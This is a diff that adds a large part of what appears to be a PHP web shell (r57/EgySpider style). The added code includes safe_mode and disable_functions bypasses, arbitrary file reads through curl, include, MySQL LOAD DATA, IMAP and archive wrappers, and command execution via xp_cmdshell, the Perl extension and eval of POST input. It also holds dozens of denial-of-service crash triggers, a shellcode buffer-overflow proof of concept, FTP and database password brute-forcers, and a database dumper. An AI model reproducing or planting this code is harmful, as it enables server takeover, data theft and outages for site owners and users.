+ if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+ {
+ foreach ($d as $file)
+ {
+ if ($file=="." || $file=="..") continue;
+ @clearstatcache();
+ @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+ if(!$unix){
+ echo date("d.m.Y H:i",$mtime);
+ if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
+ }
+ else{
+ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+ $owner = @posix_getpwuid($uid);
+ $grgid = @posix_getgrgid($gid);
+ }else{$owner['name']=$grgid['name']='';}
+ echo $inode." ";
+ echo perms(@fileperms($file));
+ @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+ echo @date("d.m.Y H:i ",$mtime);
+ }
+ echo "$file\n";
+ }
+ }
+
+
+ elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+ {
+ while (false!==($file=$d->read()))
+ {
+ if ($file=="." || $file=="..") continue;
+ @clearstatcache();
+ @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+ if(!$unix){
+ echo date("d.m.Y H:i",$mtime);
+ if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
+ }
+ else{
+ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+ $owner = @posix_getpwuid($uid);
+ $grgid = @posix_getgrgid($gid);
+ }else{$owner['name']=$grgid['name']='';}
+ echo $inode." ";
+ echo perms(@fileperms($file));
+ @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+ echo @date("d.m.Y H:i ",$mtime);
+ }
+ echo "$file\n";
+ }
+ $d->close();
+ }
+
+ elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
+ {
+ while (false!==($file=@readdir($d)))
+ {
+ if ($file=="." || $file=="..") continue;
+ @clearstatcache();
+ @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+ if(!$unix){
+ echo date("d.m.Y H:i",$mtime);
+ if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
+ }
+ else{
+ if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
+ $owner = @posix_getpwuid($uid);
+ $grgid = @posix_getgrgid($gid);
+ }else{$owner['name']=$grgid['name']='';}
+ echo $inode." ";
+ echo perms(@fileperms($file));
+ @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+ echo @date("d.m.Y H:i ",$mtime);
+ }
+ echo "$file\n";
+ }
+ @closedir($d);
+ }
+
+
+ elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
+ {
+ echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
+ function eh($errno, $errstr, $errfile, $errline)
+ {
+ global $D, $c, $i;
+ preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
+ if($o){ $D[$c] = $o[2]; $c++;}
+ }
+ $error_reporting = @ini_get('error_reporting');
+ error_reporting(E_WARNING);
+ @ini_set("display_errors", 1);
+ @ini_alter("display_errors", 1);
+ $root = "/";
+ if($dir) $root = $dir;
+ $c = 0; $D = array();
+ @set_error_handler("eh");
+ $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ for($i=0; $i < strlen($chars); $i++)
+ {
+ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
+ $prevD = $D[count($D)-1];
+ @glob($path."*");
+ if($D[count($D)-1] != $prevD)
+ {
+ for($j=0; $j < strlen($chars); $j++)
+ {
+ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
+ $prevD2 = $D[count($D)-1];
+ @glob($path."*");
+ if($D[count($D)-1] != $prevD2)
+ {
+ for($p=0; $p < strlen($chars); $p++)
+ {
+ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
+ $prevD3 = $D[count($D)-1];
+ @glob($path."*");
+ if($D[count($D)-1] != $prevD3)
+ {
+ for($r=0; $r < strlen($chars); $r++)
+ {
+ $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
+ @glob($path."*");
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ $D = array_unique($D);
+ foreach($D as $item) echo "{$item}\r\n";
+ echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
+ error_reporting($error_reporting);
+ }
+ elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
+ {
+ echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
+ if(!$dir){$dir='/etc/';};
+ if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
+ if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
+
+
+ if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
+ if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
+ foreach($presets_rlph as $preset_rlph){
+ if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
+ }
+ for($i=0; $i < strlen($chars_rlph); $i++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
+ if($n_rlph<=1){continue;};
+ for($j=0; $j < strlen($chars_rlph); $j++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
+ if($n_rlph<=2){continue;};
+ for($x=0; $x < strlen($chars_rlph); $x++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
+ if($n_rlph<=3){continue;};
+ for($y=0; $y < strlen($chars_rlph); $y++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
+ if($n_rlph<=4){continue;};
+ for($z=0; $z < strlen($chars_rlph); $z++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
+ if($n_rlph<=5){continue;};
+ for($w=0; $w < strlen($chars_rlph); $w++){
+ if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
+ }
+ }
+ }
+ }
+ }
+ }
+ echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
+ }
+ else echo $lang[$language.'_text29'];
+ break;
+
+ case 'test1':
+ $ci = @curl_init("file://".$_POST['test1_file']);
+ $cf = @curl_exec($ci);
+ echo htmlspecialchars($cf);
+ break;
+ case 'test2':
+ @include($_POST['test2_file']);
+ break;
+ case 'test3':
+ if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+ $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+ if($db)
+ {
+ if(@mysql_select_db($_POST['test3_md'],$db))
+ {
+ @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+ @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
+ @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+ $r = @mysql_query("SELECT * FROM temp_r57_table");
+ while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
+ @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mysql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to mysql server";
+ break;
+ case 'test4':
+ if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+ $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+ if($db)
+ {
+ if(@mssql_select_db($_POST['test4_md'],$db))
+ {
+ @mssql_query("drop table r57_temp_table",$db);
+ @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+ @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+ $res = mssql_query("select * from r57_temp_table",$db);
+ while(($row=@mssql_fetch_row($res)))
+ {
+ echo htmlspecialchars($row[0])."\r\n";
+ }
+ @mssql_query("drop table r57_temp_table",$db);
+ }
+ else echo "[-] ERROR! Can't select database";
+ @mssql_close($db);
+ }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'test5':
+ $temp=tempnam($dir, "fname");
+ if (@file_exists($temp)) @unlink($temp);
+ $extra = "-C ".$_POST['test5_file']." -X $temp";
+ @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+ $str = moreread($temp);
+ echo htmlspecialchars($str);
+ @unlink($temp);
+ break;
+ case 'test6':
+ $stream = @imap_open('/etc/passwd', "", "");
+ $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+ for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
+ @imap_close($stream);
+ break;
+ case 'test7':
+ $stream = @imap_open($_POST['test7_file'], "", "");
+ $str = @imap_body($stream, 1);
+ echo htmlspecialchars($str);
+ @imap_close($stream);
+ break;
+ case 'test8':
+ $temp=@tempnam($_POST['test8_file2'], "copytemp");
+ $str = readzlib($_POST['test8_file1'],$temp);
+ echo htmlspecialchars($str);
+ @unlink($temp);
+ break;
+
+ case 'test9':
+ @ini_restore("safe_mode");
+ @ini_restore("open_basedir");
+ $str = moreread($_POST['test9_file']);
+ echo htmlspecialchars($str);
+ break;
+ case 'test10':
+ @ob_clean();
+ $error_reporting = @ini_get('error_reporting');
+ error_reporting(E_ALL ^ E_NOTICE);
+ @ini_set("display_errors", 1);
+ @ini_alter("display_errors", 1);
+ $str=@fopen($_POST['test10_file'],"r");
+ while(!feof($str)){print htmlspecialchars(fgets($str));}
+ fclose($str);
+ error_reporting($error_reporting);
+ break;
+ case 'test11':
+ @ob_clean();
+ $temp = 'zip://'.$_POST['test11_file'];
+ $str = moreread($temp);
+ echo htmlspecialchars($str);
+ break;
+ case 'test12':
+ @ob_clean();
+ $temp = 'compress.bzip2://'.$_POST['test12_file'];
+ $str = moreread($temp);
+ echo htmlspecialchars($str);
+ break;
+ case 'test13':
+ @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
+ echo $lang[$language.'_text61'];
+ break;
+ case 'test14':
+ @session_save_path($_POST['test14_file2']."\0;$tempdir");
+ @session_start();
+ @$_SESSION[php]=$_POST['test14_file1'];
+ echo $lang[$language.'_text61'];
+ break;
+ case 'test15':
+ @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
+ echo $lang[$language.'_text61'];
+
+ break;
+ case 'test_5_2_6':
+echo getcwd()."\n";
+chdir($_POST['test_5_2_6']);
+echo getcwd()."\n";
+ break;
+
+
+ case 'test2_5_2_6':
+var_dump(posix_access($_POST['test15_file1']));
+
+
+ break;
+
+ case 'test_5_2_4':
+//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
+
+
+//author: shinnai
+//mail: shinnai[at]autistici[dot]org
+//site: http://shinnai.altervista.org
+
+
+//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
+
+
+//Technical details:
+//ionCube version: 6.5
+//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
+//url: www.egyspider.eu
+
+
+//php.ini settings:
+//safe_mode = On
+//disable_functions = ioncube_read_file, readfile
+
+
+//Description:
+//This is useful to obtain juicy informations but also to retrieve source
+//code of php pages, password files, etc... you just need to change file path.
+//Anyway, don't worry, nobody will read your obfuscated code :)
+
+
+//greetz to: BlackLight for help me to understand better PHP
+
+
+//P.S.
+//This extension contains even an interesting ioncube_write_file function...
+
+
+if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required! You are now can establish any order");
+
+
+$path = str_repeat("..\\", 20);
+
+
+$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
+
+
+$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
+
+
+echo $MyBoot_readfile;
+
+
+echo "<br><br>ionCube output:<br><br>";
+
+
+echo $MyBoot_ioncube;
+ break;
+
+
+
+ case 'egy_perl':
+if(!extension_loaded('perl'))die('perl extension is not loaded');
+if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
+if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
+$perl=new perl();
+echo "<textarea rows='25' cols='75'>";
+$perl->eval("system('".$_GET['cmd']."')");
+echo "</textarea>";
+$_GET['cmd']=htmlspecialchars($_GET['cmd']);
+ break;
+
+ break;
+ case 'egy_4_2_0':
+ for ($i = 0; $i < 60000; $i++)
+ {
+ if (($tab = @posix_getpwuid($i)) != NULL)
+ {
+ echo $tab['name'].":";
+ echo $tab['passwd'].":";
+ echo $tab['uid'].":";
+ echo $tab['gid'].":";
+ echo $tab['gecos'].":";
+ echo $tab['dir'].":";
+ echo $tab['shell']."<br>";
+ }
+ }
+ break;
+
+
+
+
+ case 'egy_5_2_3':
+//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
+
+
+//author: egy spider
+//mail: egy_spider@hotmail.com
+//site: http://egyspider.eu
+
+
+//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
+
+
+//Thanks to rgod for all his precious advises :)
+
+
+//I set php.ini in this way:
+//safe_mode = On
+//disable_functions = system
+//if you launch the exploit from the cli, cmd.exe will be wxecuted
+//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
+
+
+if (!extension_loaded("win32std")) die("win32std extension required!");
+system("cmd.exe"); //just to be sure that protections work well
+win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
+ break;
+
+
+ break;
+
+
+ case 'test16':
+ if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
+ break;
+ case 'test17_1':
+ @unlink('symlinkread');
+ @symlink('a/a/a/a/a/a/', 'dummy');
+ @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
+ @unlink('dummy');
+ while (1)
+ {
+ @symlink('.', 'dummy');
+ @unlink('dummy');
+ }
+ break;
+ case 'test17_2':
+ $str='';
+ while (strlen($str) < 3) {
+/* $str = moreread('symlinkread');*/
+ $str = @file_get_contents('symlinkread');
+ if($str){ @ob_clean(); echo htmlspecialchars($str);}
+ }
+ break;
+ case 'test17_3':
+ $dir = $files = array();
+ if(@version_compare(@phpversion(),"5.0.0")>=0){
+ while (@count($dir) < 3) {
+ $dir=@scandir('symlinkread');
+ if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
+ }
+ }
+ else {
+ while (@count($files) < 3) {
+ $dh = @opendir('symlinkread');
+ while (false !== ($filename = @readdir($dh))) {
+ $files[] = $filename;
+ }
+ if(@count($files) > 2){@ob_clean(); @print_r($files); }
+ }
+ }
+ break;
+ case 'test18':
+ @putenv("TMPDIR=".$_POST['test18_file2']);
+ @ini_set("session.save_path", "");
+ @ini_alter("session.save_path", "");
+ @session_start();
+ @$_SESSION[php]=$_POST['test18_file1'];
+ echo $lang[$language.'_text61'];
+ break;
+ case 'test19':
+ if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
+ $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
+ if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
+ $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
+ $m->set_local_infile_handler("r");
+ $m->query("DROP TABLE IF EXISTS temp_r57_table");
+ $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
+ $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
+ $r = $m->query("SELECT * FROM temp_r57_table");
+ while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
+ $m->query("DROP TABLE IF EXISTS temp_r57_table");
+ $m->close();
+ break;
+ }
+}
+
+
+if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+}/*elseif($safe_mode){
+ $cmd_rep = safe_ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }
+}
+*/
+
+
+switch($_POST['cmd'])
+{
+ case 'dos1':
+ function a() { a(); } a();
+ break;
+ case 'dos2':
+ @pack("d4294967297", 2);
+ break;
+ case 'dos3':
+ $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
+ break;
+ case 'dos4':
+ $t = array(1);while (1) {$a[] = &$t;};
+ break;
+ case 'dos5':
+ @dl("sqlite.so");$db = new SqliteDatabase("foo");
+ break;
+ case 'dos6':
+ preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
+ break;
+ case 'dos7':
+ @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
+ break;
+ case 'dos8':
+ @shell_exec("killall -11 httpd");
+ break;
+ case 'dos9':
+ function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
+ break;
+ case 'dos10':
+ $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
+ break;
+ case 'dos11':
+ @array_fill(1,123456789,"Infigo-IS");
+ break;
+ case 'dos12':
+ @substr_compare("A","A",12345678);
+ break;
+ case 'dos13':
+ @unserialize("a:2147483649:{");
+ break;
+ case 'dos14':
+ $Data = @str_ireplace("\n", "<br>", $Data);
+ break;
+ case 'dos15':
+ function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
+ $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
+ @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
+ break;
+ case 'dos16':
+ $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
+ for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
+ unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
+ break;
+ case 'dos17':
+ $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
+ $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
+ $x = "AQ ";
+ unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
+ break;
+ case 'dos18':
+ $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
+ if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
+ echo "Msg not sent because $msg_err\n";
+ if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
+ echo "$msg\n";
+ } else { echo "Received $msg_error fetching message\n"; break; }
+ @msg_remove_queue ($msg_id);
+ break;
+ case 'dos19':
+ $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
+ break;
+ case 'dos20':
+ $hashtable = str_repeat("A", 39);
+ $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
+ $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
+ $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
+ for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
+ $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
+ @unserialize($str);
+ break;
+ case 'dos21':
+ imagecreatetruecolor(1234,1073741824);
+ break;
+ case 'dos22':
+ imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
+ break;
+ case 'dos23':
+ $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
+ break;
+ case 'dos24':
+ setlocale(LC_COLLATE, str_repeat("A", 34438013));
+ break;
+ case 'dos25':
+ glob(str_repeat("A", 9638013));
+ break;
+ case 'dos26':
+ glob("a",-1);
+ break;
+ case 'dos27':
+ fnmatch("*[1]e", str_repeat("A", 9638013));
+ break;
+ case 'dos28':
+ if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
+ break;
+ case 'dos29':
+ if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
+ break;
+ case 'dos30':
+ $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c);
+ break;
+ case 'dos31':
+ if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
+ break;
+ case 'dos32':
+ if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
+ break;
+ case 'dos33':
+ $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
+ break;
+ case 'dos34':
+ if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
+ break;
+ case 'dos35':
+ $a = str_repeat("/", 4199000); iconv(1, $a, 1);
+ break;
+ case 'dos36':
+ $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
+ break;
+ case 'dos37':
+ $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
+ break;
+ case 'dos39':
+ sprintf("[%'A2147483646s]\n", "A");
+ break;
+ break;
+ case 'dos40':
+// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
+// poc exploit (and safe_mode bypass)
+// windows 2000 sp3 en / seh overwrite
+// by rgod
+// site: http://egyspider.eu
+
+
+// u can easily adjust for php5
+// this as my little contribute to MOPB
+
+
+$____scode=
+"\xeb\x1b".
+"\x5b".
+"\x31\xc0".
+"\x50".
+"\x31\xc0".
+"\x88\x43\x59".
+"\x53".
+"\xbb\xca\x73\xe9\x77". //WinExec
+"\xff\xd3".
+"\x31\xc0".
+"\x50".
+"\xbb\x5c\xcf\xe9\x77". //ExitProcess
+"\xff\xd3".
+"\xe8\xe0\xff\xff\xff".
+"\x63\x6d\x64".
+"\x2e".
+"\x65".
+"\x78\x65".
+"\x20\x2f".
+"\x63\x20".
+"start notepad & ";
+
+
+ $eip="\xdc\xf5\x12";
+ $____suntzu=str_repeat("\x90",100);
+ $____suntzu.=$____scode;
+ $____suntzu.=str_repeat("a",2460 - strlen($____scode));
+ $____suntzu.=$eip;
+ break;
+ case 'zend':
+ if(empty($_POST['zend'])){
+} else {
+
+
+$dezend=$_POST['zend'];
+include($_POST['zend']);
+print_r($GLOBALS);
+require_once("$dezend");
+echo "</textarea></p>";
+}
+break;
+ case 'dos38':
+ $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
+ break;
+}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+
+
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+ {
+ $connection = @ftp_connect($ftp_server,$ftp_port,10);
+ if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+ else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+ @ftp_close($connection);
+ }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
+ foreach($users as $user)
+ {
+ $connection = @ftp_connect($ftp_server,$ftp_port,10);
+ if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
+ @ftp_close($connection);
+ }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+
+if ($_POST['cmd']=="db_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+ {
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $user;
+ $sql->pass = $user;
+ if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
+ }
+ if(isset($_POST['reverse']))
+ {
+ foreach($users as $user)
+ {
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $user;
+ $sql->pass = strrev($user);
+ if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
+ }
+ }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
+ foreach($users as $user)
+ {
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $user;
+ if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
+ }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+
+if ($_POST['cmd']=="mysql_dump")
+ {
+ if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+ else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+ else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+ else {
+ if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+ else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }
+ else { echo "[-] ERROR! Can't write in dump file"; }
+ }
+ }
+
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+
+
+function div_title($title, $id)
+{
+ return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
+ $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
+ if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+
+if(!$safe_mode){
